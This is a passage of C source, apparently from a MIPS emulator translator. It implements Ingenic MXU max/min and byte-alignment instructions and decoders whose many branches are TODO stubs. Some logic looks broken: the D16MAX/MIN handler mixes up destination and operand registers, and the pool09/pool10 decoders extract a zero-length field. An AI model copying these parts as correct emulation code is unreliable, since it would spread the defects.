*tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, opc, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); opc = extract32(ctx->opcode, 18, 3); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRc == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRa == 0))) { /* both operands zero registers -> just set destination to zero */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRc - 1], 0); } else if (unlikely((XRb == 0) || (XRa == 0))) { /* exactly one operand is zero register - find which one is not...*/ uint32_t XRx = XRb ? XRb : XRc; /* ...and do half-word-wise max/min with one operand 0 */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); /* the left half-word first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0xFFFF0000); if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* the right half-word */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0x0000FFFF); /* move half-words to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 16); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return resulting half-words to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 16); /* finaly update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); /* the left half-word first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0xFFFF0000); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFFFF0000); if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* the right half-word */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x0000FFFF); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0x0000FFFF); /* move half-words to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 16); tcg_gen_shli_i32(tcg_ctx, t1, t1, 16); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_D16MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return resulting half-words to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 16); /* finaly update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } } /* * Q8MAX * Update XRa with the 8-bit-wise maximums of signed integers * contained in XRb and XRc. * * Q8MIN * Update XRa with the 8-bit-wise minimums of signed integers * contained in XRb and XRc. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0| opc | XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ */ static void gen_mxu_Q8MAX_Q8MIN(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t pad, opc, XRc, XRb, XRa; pad = extract32(ctx->opcode, 21, 5); opc = extract32(ctx->opcode, 18, 3); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to zero */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely((XRb == 0) || (XRc == 0))) { /* exactly one operand is zero register - make it be the first...*/ uint32_t XRx = XRb ? XRb : XRc; /* ...and do byte-wise max/min with one operand 0 */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_const_i32(tcg_ctx, 0); int32_t i; /* the leftmost byte (byte 3) first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0xFF000000); if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* bytes 2, 1, 0 */ for (i = 2; i >= 0; i--) { /* extract the byte */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRx - 1], 0xFF << (8 * i)); /* move the byte to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 8 * (3 - i)); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return resulting byte to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 8 * (3 - i)); /* finaly update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } else if (unlikely(XRb == XRc)) { /* both operands same -> just set destination to one of them */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } else { /* the most general case */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); int32_t i; /* the leftmost bytes (bytes 3) first */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0xFF000000); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFF000000); if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); } /* bytes 2, 1, 0 */ for (i = 2; i >= 0; i--) { /* extract corresponding bytes */ tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0xFF << (8 * i)); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFF << (8 * i)); /* move the bytes to the leftmost position */ tcg_gen_shli_i32(tcg_ctx, t0, t0, 8 * (3 - i)); tcg_gen_shli_i32(tcg_ctx, t1, t1, 8 * (3 - i)); /* t0 will be max/min of t0 and t1 */ if (opc == OPC_MXU_Q8MAX) { tcg_gen_smax_i32(tcg_ctx, t0, t0, t1); } else { tcg_gen_smin_i32(tcg_ctx, t0, t0, t1); } /* return resulting byte to its original position */ tcg_gen_shri_i32(tcg_ctx, t0, t0, 8 * (3 - i)); /* finaly update the destination */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRa - 1], t0); } tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } } /* * MXU instruction category: align * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * * S32ALN S32ALNI */ /* * S32ALNI XRc, XRb, XRa, optn3 * Arrange bytes from XRb and XRc according to one of five sets of * rules determined by optn3, and place the result in XRa. * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+-----+---+-----+-------+-------+-------+-----------+ * | SPECIAL2 |optn3|0 0|x x x| XRc | XRb | XRa |MXU__POOL16| * +-----------+-----+---+-----+-------+-------+-------+-----------+ * */ static void gen_mxu_S32ALNI(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t optn3, pad, XRc, XRb, XRa; optn3 = extract32(ctx->opcode, 23, 3); pad = extract32(ctx->opcode, 21, 2); XRc = extract32(ctx->opcode, 14, 4); XRb = extract32(ctx->opcode, 10, 4); XRa = extract32(ctx->opcode, 6, 4); if (unlikely(pad != 0)) { /* opcode padding incorrect -> do nothing */ } else if (unlikely(XRa == 0)) { /* destination is zero register -> do nothing */ } else if (unlikely((XRb == 0) && (XRc == 0))) { /* both operands zero registers -> just set destination to all 0s */ tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); } else if (unlikely(XRb == 0)) { /* XRb zero register -> just appropriatelly shift XRc into XRa */ switch (optn3) { case MXU_OPTN3_PTN0: tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); break; case MXU_OPTN3_PTN1: case MXU_OPTN3_PTN2: case MXU_OPTN3_PTN3: tcg_gen_shri_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1], 8 * (4 - optn3)); break; case MXU_OPTN3_PTN4: tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); break; } } else if (unlikely(XRc == 0)) { /* XRc zero register -> just appropriatelly shift XRb into XRa */ switch (optn3) { case MXU_OPTN3_PTN0: tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); break; case MXU_OPTN3_PTN1: case MXU_OPTN3_PTN2: case MXU_OPTN3_PTN3: tcg_gen_shri_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], 8 * optn3); break; case MXU_OPTN3_PTN4: tcg_gen_movi_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], 0); break; } } else if (unlikely(XRb == XRc)) { /* both operands same -> just rotation or moving from any of them */ switch (optn3) { case MXU_OPTN3_PTN0: case MXU_OPTN3_PTN4: tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); break; case MXU_OPTN3_PTN1: case MXU_OPTN3_PTN2: case MXU_OPTN3_PTN3: tcg_gen_rotli_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1], 8 * optn3); break; } } else { /* the most general case */ switch (optn3) { case MXU_OPTN3_PTN0: { /* */ /* XRb XRc */ /* +---------------+ */ /* | A B C D | E F G H */ /* +-------+-------+ */ /* | */ /* XRa */ /* */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRb - 1]); } break; case MXU_OPTN3_PTN1: { /* */ /* XRb XRc */ /* +-------------------+ */ /* A | B C D E | F G H */ /* +---------+---------+ */ /* | */ /* XRa */ /* */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x00FFFFFF); tcg_gen_shli_i32(tcg_ctx, t0, t0, 8); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFF000000); tcg_gen_shri_i32(tcg_ctx, t1, t1, 24); tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } break; case MXU_OPTN3_PTN2: { /* */ /* XRb XRc */ /* +-------------------+ */ /* A B | C D E F | G H */ /* +---------+---------+ */ /* | */ /* XRa */ /* */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x0000FFFF); tcg_gen_shli_i32(tcg_ctx, t0, t0, 16); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFFFF0000); tcg_gen_shri_i32(tcg_ctx, t1, t1, 16); tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } break; case MXU_OPTN3_PTN3: { /* */ /* XRb XRc */ /* +-------------------+ */ /* A B C | D E F G | H */ /* +---------+---------+ */ /* | */ /* XRa */ /* */ TCGv_i32 t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_i32(tcg_ctx, t0, tcg_ctx->mxu_gpr[XRb - 1], 0x000000FF); tcg_gen_shli_i32(tcg_ctx, t0, t0, 24); tcg_gen_andi_i32(tcg_ctx, t1, tcg_ctx->mxu_gpr[XRc - 1], 0xFFFFFF00); tcg_gen_shri_i32(tcg_ctx, t1, t1, 8); tcg_gen_or_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } break; case MXU_OPTN3_PTN4: { /* */ /* XRb XRc */ /* +---------------+ */ /* A B C D | E F G H | */ /* +-------+-------+ */ /* | */ /* XRa */ /* */ tcg_gen_mov_i32(tcg_ctx, tcg_ctx->mxu_gpr[XRa - 1], tcg_ctx->mxu_gpr[XRc - 1]); } break; } } } /* * Decoding engine for MXU * ======================= */ /* * * Decode MXU pool00 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL00| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool00(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_S32MAX: case OPC_MXU_S32MIN: gen_mxu_S32MAX_S32MIN(ctx); break; case OPC_MXU_D16MAX: case OPC_MXU_D16MIN: gen_mxu_D16MAX_D16MIN(ctx); break; case OPC_MXU_Q8MAX: case OPC_MXU_Q8MIN: gen_mxu_Q8MAX_Q8MIN(ctx); break; case OPC_MXU_Q8SLT: /* TODO: Implement emulation of Q8SLT instruction. */ MIPS_INVAL("OPC_MXU_Q8SLT"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8SLTU: /* TODO: Implement emulation of Q8SLTU instruction. */ MIPS_INVAL("OPC_MXU_Q8SLTU"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool01 * * S32SLT, D16SLT, D16AVG, D16AVGR, Q8AVG, Q8AVGR: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL01| * +-----------+---------+-----+-------+-------+-------+-----------+ * * Q8ADD: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+-----+-----+-------+-------+-------+-----------+ * | SPECIAL2 |en2|0 0 0|x x x| XRc | XRb | XRa |MXU__POOL01| * +-----------+---+-----+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool01(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_S32SLT: /* TODO: Implement emulation of S32SLT instruction. */ MIPS_INVAL("OPC_MXU_S32SLT"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16SLT: /* TODO: Implement emulation of D16SLT instruction. */ MIPS_INVAL("OPC_MXU_D16SLT"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16AVG: /* TODO: Implement emulation of D16AVG instruction. */ MIPS_INVAL("OPC_MXU_D16AVG"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16AVGR: /* TODO: Implement emulation of D16AVGR instruction. */ MIPS_INVAL("OPC_MXU_D16AVGR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8AVG: /* TODO: Implement emulation of Q8AVG instruction. */ MIPS_INVAL("OPC_MXU_Q8AVG"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8AVGR: /* TODO: Implement emulation of Q8AVGR instruction. */ MIPS_INVAL("OPC_MXU_Q8AVGR"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8ADD: /* TODO: Implement emulation of Q8ADD instruction. */ MIPS_INVAL("OPC_MXU_Q8ADD"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool02 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-----+-------+-------+-------+-----------+ * | SPECIAL2 |0 0 0 0 0|x x x| XRc | XRb | XRa |MXU__POOL02| * +-----------+---------+-----+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool02(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 18, 3); switch (opcode) { case OPC_MXU_S32CPS: /* TODO: Implement emulation of S32CPS instruction. */ MIPS_INVAL("OPC_MXU_S32CPS"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16CPS: /* TODO: Implement emulation of D16CPS instruction. */ MIPS_INVAL("OPC_MXU_D16CPS"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q8ABD: /* TODO: Implement emulation of Q8ABD instruction. */ MIPS_INVAL("OPC_MXU_Q8ABD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_Q16SAT: /* TODO: Implement emulation of Q16SAT instruction. */ MIPS_INVAL("OPC_MXU_Q16SAT"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool03 * * D16MULF: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |x x|on2|0 0 0 0| XRc | XRb | XRa |MXU__POOL03| * +-----------+---+---+-------+-------+-------+-------+-----------+ * * D16MULE: * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |x x|on2| Xd | XRc | XRb | XRa |MXU__POOL03| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool03(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 24, 2); switch (opcode) { case OPC_MXU_D16MULF: /* TODO: Implement emulation of D16MULF instruction. */ MIPS_INVAL("OPC_MXU_D16MULF"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D16MULE: /* TODO: Implement emulation of D16MULE instruction. */ MIPS_INVAL("OPC_MXU_D16MULE"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool04 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL04| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool04(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 20, 1); switch (opcode) { case OPC_MXU_S32LDD: case OPC_MXU_S32LDDR: gen_mxu_s32ldd_s32lddr(ctx); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool05 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL05| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool05(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 20, 1); switch (opcode) { case OPC_MXU_S32STD: /* TODO: Implement emulation of S32STD instruction. */ MIPS_INVAL("OPC_MXU_S32STD"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32STDR: /* TODO: Implement emulation of S32STDR instruction. */ MIPS_INVAL("OPC_MXU_S32STDR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool06 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL06| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool06(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 10, 4); switch (opcode) { case OPC_MXU_S32LDDV: /* TODO: Implement emulation of S32LDDV instruction. */ MIPS_INVAL("OPC_MXU_S32LDDV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32LDDVR: /* TODO: Implement emulation of S32LDDVR instruction. */ MIPS_INVAL("OPC_MXU_S32LDDVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool07 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL07| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool07(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 10, 4); switch (opcode) { case OPC_MXU_S32STDV: /* TODO: Implement emulation of S32TDV instruction. */ MIPS_INVAL("OPC_MXU_S32TDV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32STDVR: /* TODO: Implement emulation of S32TDVR instruction. */ MIPS_INVAL("OPC_MXU_S32TDVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool08 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL08| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool08(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 20, 1); switch (opcode) { case OPC_MXU_S32LDI: /* TODO: Implement emulation of S32LDI instruction. */ MIPS_INVAL("OPC_MXU_S32LDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32LDIR: /* TODO: Implement emulation of S32LDIR instruction. */ MIPS_INVAL("OPC_MXU_S32LDIR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool09 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+-+-------------------+-------+-----------+ * | SPECIAL2 | rb |x| s12 | XRa |MXU__POOL09| * +-----------+---------+-+-------------------+-------+-----------+ * */ static void decode_opc_mxu__pool09(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 5, 0); switch (opcode) { case OPC_MXU_S32SDI: /* TODO: Implement emulation of S32SDI instruction. */ MIPS_INVAL("OPC_MXU_S32SDI"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32SDIR: /* TODO: Implement emulation of S32SDIR instruction. */ MIPS_INVAL("OPC_MXU_S32SDIR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool10 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL10| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool10(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 5, 0); switch (opcode) { case OPC_MXU_S32LDIV: /* TODO: Implement emulation of S32LDIV instruction. */ MIPS_INVAL("OPC_MXU_S32LDIV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32LDIVR: /* TODO: Implement emulation of S32LDIVR instruction. */ MIPS_INVAL("OPC_MXU_S32LDIVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool11 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---------+---------+---+-------+-------+-----------+ * | SPECIAL2 | rb | rc |st2|x x x x| XRa |MXU__POOL11| * +-----------+---------+---------+---+-------+-------+-----------+ * */ static void decode_opc_mxu__pool11(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 10, 4); switch (opcode) { case OPC_MXU_S32SDIV: /* TODO: Implement emulation of S32SDIV instruction. */ MIPS_INVAL("OPC_MXU_S32SDIV"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_S32SDIVR: /* TODO: Implement emulation of S32SDIVR instruction. */ MIPS_INVAL("OPC_MXU_S32SDIVR"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool12 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |an2|x x| Xd | XRc | XRb | XRa |MXU__POOL12| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool12(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case OPC_MXU_D32ACC: /* TODO: Implement emulation of D32ACC instruction. */ MIPS_INVAL("OPC_MXU_D32ACC"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32ACCM: /* TODO: Implement emulation of D32ACCM instruction. */ MIPS_INVAL("OPC_MXU_D32ACCM"); generate_exception_end(ctx, EXCP_RI); break; case OPC_MXU_D32ASUM: /* TODO: Implement emulation of D32ASUM instruction. */ MIPS_INVAL("OPC_MXU_D32ASUM"); generate_exception_end(ctx, EXCP_RI); break; default: MIPS_INVAL("decode_opc_mxu"); generate_exception_end(ctx, EXCP_RI); break; } } /* * * Decode MXU pool13 * * 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 9 8 7 6 5 4 3 2 1 0 * +-----------+---+---+-------+-------+-------+-------+-----------+ * | SPECIAL2 |en2|x x|0 0 0 0| XRc | XRb | XRa |MXU__POOL13| * +-----------+---+---+-------+-------+-------+-------+-----------+ * */ static void decode_opc_mxu__pool13(CPUMIPSState *env, DisasContext *ctx) { uint32_t opcode = extract32(ctx->opcode, 22, 2); switch (opcode) { case 